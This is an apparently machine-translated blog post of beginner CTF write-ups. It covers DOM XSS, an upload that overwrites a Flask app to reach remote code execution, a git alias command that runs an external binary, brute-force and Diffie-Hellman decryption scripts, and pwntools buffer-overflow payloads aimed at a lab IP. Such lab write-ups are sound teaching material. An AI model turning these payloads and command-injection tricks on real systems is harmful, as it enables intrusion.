Tritium

Tritium

HomeArchives

I am still a newbie.

#CTF!85
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This is a CTF challenge with various tasks such as web exploitation, miscellaneous, crypto, and pwn. Participants need to find vulnerabilities like XSS, file upload, and hash attacks to gain control or access specific information. The challenge also involves Diffie-Hellman key exchange, RSA encryption, and buffer overflow exploitation. Participants need to exploit these vulnerabilities to solve the challenges and progress in the competition.

Write interesting writeups for the newbie CTF challenges.

web#

babyjvav#

https://www.tritium.work/2023/11/06/Java Pitfalls for Beginners/

secchat#

image

There is a DOM XSS vulnerability here that inserts innerHTML. It can be triggered using the svg tag or the onerror attribute of the img tag.

Note that when initiating a chat, the id calls the message function. So, construct an XSS payload in the id and send it to the admin. This way, you can control the admin's behavior through various function calls.

I want to score 500 in the snow#

..I think this question is very low-level.

daxue =new Proxy({
        "math": "150",
        "computer": new String("150"),
        "politics": 98,
        "english": 100,
        "flag": 0,
        value:500

    }, {
        get:function (target, prop, receiver) {
            if (prop === 'politics') {
                if (target.politics !== 100) {
                    return target.politics++;
                } else {
                    return target.politics;
                }
            };
            if(prop === "valueOf"){
                return function() {
                    return target.value;
                };
            };
            if (prop === 'english') {
                if (target.english !== 100){
                    return "99";
                }else {
                    return target.english++;
                }
            };
            return Reflect.get(target, prop,receiver);
        }
    });

My new flask#

Use arbitrary file upload to overwrite /src/app.py and add a malicious route. This way, you can achieve remote code execution (RCE).

image

misc#

Snow Tree Saw Structure#

This question tests a rarely used feature of gitshell.

git -c alias.test='!/readflag' test

Use alias to introduce an external command.

Memory Forensics#

Use vol to view processes, dump out backdoor.exe, and read it.

What was before 3G#

I wanted to test information theory, but there must be a detour in the CTF environment.

while True:
    r = remote("172.20.14.117",53001)
    for i in range(15):
        print(r.recvuntil(b"Ask Shannon:\n[-] "))
        r.sendline(b"1")
    r.recvuntil(b"Now open the chests:\n[-] ")
    r.sendline(b'1 1 1 1 1 1 1')
    res = r.recvline().decode()
    if "You've found all the treas" in res:
        print(res)
        break
    else:
        print("next")
        r.close()
        continue

There are only 128 possible cases, so it will quickly result in all 1's.

crypto#

hard_pow#

I couldn't understand the hashpumpy attack, so I used a simple substitution.

https://github.com/shellfeel/hash-ext-attack/tree/master

easy_pow#

Just run brutehash to solve it, no need for a script.

playGitboy/bruteHASH

为CTF而生,随机或穷举指定格式HASH值,支持Fuzz MD系列、SHA系列等常见HASH类型

Go646

easy_dhke#

Everything has been leaked, so I stitched it into pwntools.

from Crypto.Util.number import *  # type: ignore
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad,unpad

import string
import random
import os
from pwn import *

# p is a large prime number used for modulo operations in the Diffie-Hellman key exchange
p = 327824197795087630552811243153730025469
# g is the base used for generating public keys in the Diffie-Hellman key exchange
g = 5
# alice is Alice's private key, an integer chosen by Alice
alice = 22751
# bob is Bob's private key, an integer chosen by Bob
bob = 39494
# Bob calculates his public key as g^bob mod p and assigns it to Bob (uppercase to distinguish from private key)
Bob = pow(g, bob, p)
# The shared secret key is calculated by Alice using Bob's public key, raised to the power of Alice's private key mod p
key = long_to_bytes(pow(Bob, alice, p))


def encrypt(plain_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
    return cipher_text


def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
    return plain_text


r = remote('172.20.14.117',40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa',key))
print(r.recvall())

easy_rsa#

The value of n in this question is very simple. Just factorize it using factordb and you can decrypt it.

leak_d#

Since you already know d, just decrypt it.

I seem to have deleted the script.

pwn#

right#

I figured this out myself. It's the simplest ret2text from ctfwiki.

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
r = remote("172.20.14.117",28202)
addr = 0x40115A
payload = flat([b'a'*0x28,addr])
r.recvuntil(b'so please tell me what you want to tell me\n')
# print(payload)
r.sendline(payload)
# r.sendline(b'ls')
r.interactive()
# print(r.recvline())

addr is the address of the system line, and rbp-20h+8 overwrites the stack top.

onepiece#

from pwn import *

io=remote("172.20.14.117",61768)
addr = 0x40119e
payload=b"a"*0x100+p64(addr)*0x100
io.sendline(payload)
io.interactive()

I made it up. I can't understand blindpwn.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.